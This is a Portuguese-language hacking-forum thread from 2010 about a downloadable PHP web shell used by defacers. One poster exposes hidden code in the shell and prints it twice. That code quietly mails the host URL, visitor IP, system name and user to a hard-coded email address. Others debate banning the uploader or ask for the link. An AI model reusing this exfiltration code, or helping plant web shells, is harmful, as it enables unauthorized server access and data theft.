Unconfigured Ad Widget

**TheZombie** · 17-10-2010, 02:45

baixando...vlws ai...

**r000tbR** · 17-10-2010, 19:26

Vlw cara, Shell boa. =)

**praTes** · 25-10-2010, 15:25

Atenção - Esta Shell é um Golpe!

Shell: 4e.php - MD5( fbbbb17ea58e01136510a12afc896b54 )

Foi encontrado em seu interior instruções que permitem ao dono do email fx0.name@gmail.com saber a URL exata de onde a Shell esta hospedada e Rodando.
Desta forma ele também consegue acessar a Shell que você upou em algum servidor.

Código malicioso

$visitcount = $HTTP_COOKIE_VARS["visits"];
if( $visitcount == "") {
$visitcount = 0;
$visitor = $_SERVER["REMOTE_ADDR"];
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$target = rawurldecode($web.$inj);
$uname = php_uname();
$id = get_current_user();
$body = " [+]Shell: $target \n [+]Injector: $visitor \n [+]uname -a: $uname \n [+]User: $id";
@mail("fx0.name@gmail.com","[x] http://$target by $visitor", "$body");
}
else
{ $visitcount; }
setcookie("visits",$visitcount);

Shell analisada
Por Fidqsi e passada pra mim!

**~~R4T0~~** · 25-10-2010, 16:18

Nao eh so essa q tem cx2 nao!!!aki no forum tem mais uma rsrsrsrsrs

**bigode100** · 25-10-2010, 20:16

Isso na minha opiniao é Ban ...

**Stigmata** · 26-10-2010, 00:24

Assim fica fácil =). Mete BaN

**n4sss** · 26-10-2010, 01:22

-.-

Ola a todos!

Venho por meio deste POST me explicar:

1º - Como podemos ver , fid, analisou a shell e achou o auto mailer.

$visitcount = $HTTP_COOKIE_VARS["visits"];
if( $visitcount == "") {
$visitcount = 0;
$visitor = $_SERVER["REMOTE_ADDR"];
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$target = rawurldecode($web.$inj);
$uname = php_uname();
$id = get_current_user();
$body = " [+]Shell: $target \n [+]Injector: $visitor \n [+]uname -a: $uname \n [+]User: $id";
@mail("fx0.name@gmail.com","[x] http://$target by $visitor", "$body");
}
else
{ $visitcount; }
setcookie("visits",$visitcount);

2º - Eu nao analisei o source da shell , e nao sabia do mailer.

3º - Peguei o link de download em um forum, e resolvi compartilhar, tbm usei a shell uma vez e nao sabia que nela
contia o código.
-----------------------------------------------------------------------------------------------
Analizando agora o código:

@mail("fx0.name@gmail.com".....

Podemos ver que a intençao do programador, é da ao defacer a opçao de colocar o seu email, ali
exemplo: fx0.defacer@gmail.com"

é claro que pode ser tbm o email do programador que ele deixou padrao na shell, mas nao vi nada há respeito na hora.
------------------------------------------------------------------------------------------------
Como viram eu peguei o link do uploader que no caso foi o programador.

- nao postei com 2ª 's intenções, por que nao seria sabio, postar uma shell com auto mailer em um forum onde
programadores, defacers e etc se reunem isso ja seria muita burrice, mesmo por que há defacers
no forum de alto nivel, que me conheçem e sabem quem eu sou.

- Nao analizei o source da shell:
Mas espero que entendam meu lado, nao sou sangue suga e nem aproveitador.

- Cada um tira sua conclusão com tempo de experiencia que tem na area,
e sabe realmente o que é o mundo do "HACKING".
Muitos como vi, nao querem saber de nada, apenas sugerem: BAN,BAN SEM +, AH DA LOGO BAN entre outras frases...

Mao sou de rebaixar ninguem e nao gosto de tumutuos. -
Mas sei que os verdadeiros programadores e defacers sabem o que estou falando.

att n4sss.

**bigode100** · 26-10-2010, 11:03

Falei pra dar Ban por axar qy vc esta com 2°das intençoes + c foi isso qy aconteceu
pesso desculpas ...

**n4sss** · 26-10-2010, 11:50

ok , bigode,
Nao Sou do tipo, 2º caixa.

Abraço.

**ShadowVDS** · 01-11-2010, 11:57

Poderião passa o link dessa shell pra eu poder estuda ?

Queria ve os meios que ele o programador guardou o cx2 tenho outras shell que ja achei tamben uns esconde em coder64 e md5 esse dai utilizou alguma proteção ou ele deixou simplismente aberto no codigo ?

se respode ficaria grato .

**V4g_Br4Ck3r** · 01-11-2010, 16:05

Será que da pra colocar o link da shell de volta?
Da pra tirar a parte do código, pronto! E o restante das opções?

Fiquei interessado nela!

Abraço

**Mário de Sá** · 19-11-2010, 04:44

kkkkk...valeu por analiza isso "praTes", mas eu conheço o N4sss e não é um cara de dar uma de Black Hat.

Eu acredito que devia acontece o mesmo com muito de nós, afinal de conta as pessoas que estavam a fala de dar BAN não se precuparam em analiza a shell...POR ISSO NÃO SUJAM O NOME DO N4SSS

**H4ck3r4lp** · 21-11-2010, 00:54

Link da shell trocado

**Ohniugan** · 09-11-2011, 11:04

Postado Originalmente por thexfox75

Palavrões moderados c quizer troca ideia mais to la no meu msn lacraia75@hotmail.com !@#$%¨%$

que brutalidade com o garoto =O

Unconfigured Ad Widget

Anúncio

4e priv8 shell

Download 4e priv8 shell

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment

Comment